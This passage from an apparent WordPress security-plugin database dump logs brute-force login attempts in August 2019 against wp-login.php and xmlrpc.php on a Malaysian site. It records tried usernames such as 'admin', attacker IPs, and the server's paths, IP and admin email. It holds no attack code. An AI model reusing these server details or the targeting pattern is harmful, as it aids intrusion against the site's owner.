empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"202.92.4.57\";s:11:\"REMOTE_PORT\";s:5:\"39068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUWeLdCvC5@KvzqwiFZIgAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566905976.1207\";s:12:\"REQUEST_TIME\";s:10:\"1566905976\";}}','notice','2019-08-27 11:39:37','2019-08-27 11:39:36',18202560,19499376,'https://bintara.com.my/xmlrpc.php',1,0,'202.92.4.57'),(23433,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.162.68.207\";s:11:\"REMOTE_PORT\";s:5:\"37392\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUYq4tV65@1l3w0lHOJpQAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566906539.1163\";s:12:\"REQUEST_TIME\";s:10:\"1566906539\";}}','notice','2019-08-27 11:49:00','2019-08-27 11:48:59',17686208,19175528,'https://bintara.com.my/wp-login.php',1,0,'192.162.68.207'),(23434,0,'brute_force','invalid-login::username-karen','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"karen\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.162.68.207\";s:11:\"REMOTE_PORT\";s:5:\"37846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUYrotV65@1l3w0lHOJpwAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566906542.322\";s:12:\"REQUEST_TIME\";s:10:\"1566906542\";}}','notice','2019-08-27 11:49:03','2019-08-27 11:49:02',18200464,19499760,'https://bintara.com.my/xmlrpc.php',1,0,'192.162.68.207'),(23435,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.162.68.207\";s:11:\"REMOTE_PORT\";s:5:\"45614\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUa1otV65@1l3w0lHOL8AAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566907094.9284\";s:12:\"REQUEST_TIME\";s:10:\"1566907094\";}}','notice','2019-08-27 11:58:16','2019-08-27 11:58:15',17681760,19171816,'https://bintara.com.my/wp-login.php',1,0,'192.162.68.207'),(23436,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.162.68.207\";s:11:\"REMOTE_PORT\";s:5:\"46298\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUa2otV65@1l3w0lHOL9AAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566907098.6337\";s:12:\"REQUEST_TIME\";s:10:\"1566907098\";}}','notice','2019-08-27 11:58:20','2019-08-27 11:58:19',18200800,19500880,'https://bintara.com.my/xmlrpc.php',1,0,'192.162.68.207'),(23437,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.190.126\";s:11:\"REMOTE_PORT\";s:5:\"54990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUhz4tV65@1l3w0lHORYgAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566908879.2211\";s:12:\"REQUEST_TIME\";s:10:\"1566908879\";}}','notice','2019-08-27 12:28:00','2019-08-27 12:27:59',17680840,19171128,'https://bintara.com.my/wp-login.php',1,0,'50.62.190.126'),(23438,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.190.126\";s:11:\"REMOTE_PORT\";s:5:\"57020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUh1otV65@1l3w0lHORZQAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566908887.0264\";s:12:\"REQUEST_TIME\";s:10:\"1566908887\";}}','notice','2019-08-27 12:28:08','2019-08-27 12:28:07',18201872,19500248,'https://bintara.com.my/xmlrpc.php',1,0,'50.62.190.126'),(23439,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.19.102\";s:11:\"REMOTE_PORT\";s:5:\"54644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUjzYtV65@1l3w0lHOTmgAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566909389.4087\";s:12:\"REQUEST_TIME\";s:10:\"1566909389\";}}','notice','2019-08-27 12:36:30','2019-08-27 12:36:29',17682200,19173000,'https://bintara.com.my/wp-login.php',1,0,'165.22.19.102'),(23440,0,'brute_force','invalid-login::username-1234','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"1234\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.19.102\";s:11:\"REMOTE_PORT\";s:5:\"55160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUj0GXkG1atThADMYGyDQAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566909392.5984\";s:12:\"REQUEST_TIME\";s:10:\"1566909392\";}}','notice','2019-08-27 12:36:34','2019-08-27 12:36:33',18198240,19497752,'https://bintara.com.my/xmlrpc.php',1,0,'165.22.19.102'),(23441,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 